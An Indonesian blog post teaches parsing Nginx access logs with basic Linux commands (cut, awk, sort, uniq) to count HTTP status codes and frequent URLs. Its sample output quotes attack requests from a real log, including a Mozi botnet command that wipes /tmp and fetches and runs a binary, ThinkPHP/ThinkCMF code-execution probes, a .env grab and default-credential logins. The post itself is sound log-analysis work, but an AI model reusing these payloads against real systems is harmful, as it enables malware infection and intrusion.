---
title: Parsing Access Log dengan Perintah Linux
lang: id_ID
layout: post
date: 2020-10-31 07:20:02 +0700
author: Imron Rosyadi
categories:
    - Blog
tags:
    - Web Server
    - Nginx
    - Log
---

  

Halo,

Pada kesempatan kali ini, saya akan membagikan cara tentang parsing Access Log web server Nginx. Dimana parsing ini digunakan untuk memudahkan user dalam menemukan log secara spesifik. Implementasi parsing log kali ini yaitu Access.Log pada Nginx. Disini saya menggunakan cara yang sederhana untuk melakukan parsing Access.Log tersebut menggunakan perintah dasar linux.

Langung saja simak penjelasangan berikut ini: 

Kita menggunakan format dibawah ini, dimana format tersebut merupakan format default Nginx disebut sebagai "combined". 

    $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"
**Keterangan:** 
 - $remote_addr - IP request yang telah dilakukan 
 - $remote_user - HTTP Authenticated User. Ini akan menampilkan Blank Page dimana aplikasi modern saat ini tidak menggunakan otentikasi berbasis HTTP.
 - [$time_local] - Timestamp sesuai zona waktu server 
 - “$request” - Tipe request HTTP seperti GET, POST, dan lain-lain 
 - $status - Kode respon HTTP dari server
 - $body_bytes_sent - Ukuran respon server dalam satuan bytes
 - "$http_referer" - URL referensi (jika ada)
 - “$http_user_agent” - Agen pengguna seperti yang dilihat oleh server




 1. Mengurutkan akses dengan kode respon HTTP
Untuk mengurutkan akses log dengan kode respon HTTP bisa menggunakan perintah berikut:

   `cat (path/access.log) | cut -d '"' -f3 | cut -d ' ' -f2 | sort | uniq -c | sort -rn` 
Contoh: 
 `cat /var/log/nginx/access.log | cut -d '"' -f3 | cut -d ' ' -f2 | sort | uniq -c | sort -rn`
**Output:** 

         17 404
         12 200
          2 304
          1 405
Selain itu, bisa menggunakan perintah `awk` :
`awk '{print $9}' (path/access.log) | sort | uniq -c | sort -rn`
Contoh: 
`awk '{print $9}' /var/log/nginx/access.log | sort | uniq -c | sort -rn`
**Output:** 

         17 404
         12 200
          2 304
          1 405

Dari hasil output diatas, salah satu kode respon HTTP 404 berjumlah **17 kali**. 

 2. Kode HTTP 404 pada file PHP -  yang paling sering diakses
 
 `awk '($9 ~ /404/)' /var/log/nginx/access.log | awk -F\" '($2 ~ "^GET .*\.php")' | awk '{print $7}' | sort | uniq -c | sort -r | head -n 20`
 **Output:** 
 

              2 /coba.php
              1 /wp-content/themes/twentyseventeen/EE1E076F0EB804281B2D0A65EEDF119A.php
              1 /wp-content/themes/twentynineteen/EE1E076F0EB804281B2D0A65EEDF119A.php

3. URL yang paling sering direquest 

`awk -F\" '{print $2}' /var/log/nginx/access.log | awk '{print $2}' | sort | uniq -c | sort -r`

		  3 /favicon.ico
		  2 /coba.php
		  1 /?XDEBUG_SESSION_START=phpstorm
		  1 /wp-content/themes/twentyseventeen/EE1E076F0EB804281B2D0A65EEDF119A.php
		  1 /wp-content/themes/twentynineteen/EE1E076F0EB804281B2D0A65EEDF119A.php
		  1 /wp-content/plugins/wp-file-manager/readme.txt
		  1 /w00tw00t.at.blackhats.romanian.anti-sec:)
		  1 /solr/admin/info/system?wt=json
		  1 /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
		  1 /pma/scripts/setup.php
		  1 /MyAdmin/scripts/setup.php
		  1 /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
		  1 /.env
		  1 /config/getuser?index=0
		  1 /boaform/admin/formLogin?username=adminisp&psd=adminisp
		  1 /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
		 13 /

Itu beberapa cara yang digunakan untuk parsing Access.Log pada Nginx menggunakan perintah dasar linux. Sebenarnya masih banyak lagi cara parsing Access.Log-nya, akan tetapi kesempatan ini hanya beberapa cara saja yang bisa saya bagikan. Selebihnya bisa Anda explore dan pelajari secara mandiri. 

**Referensi:** 
[Parsing access.log and error.logs using linux commands](https://rtcamp.com/tutorials/nginx/log-parsing/)

Terima kasih, 
Semoga bermanfaat dan barokah, Aamiin :) 

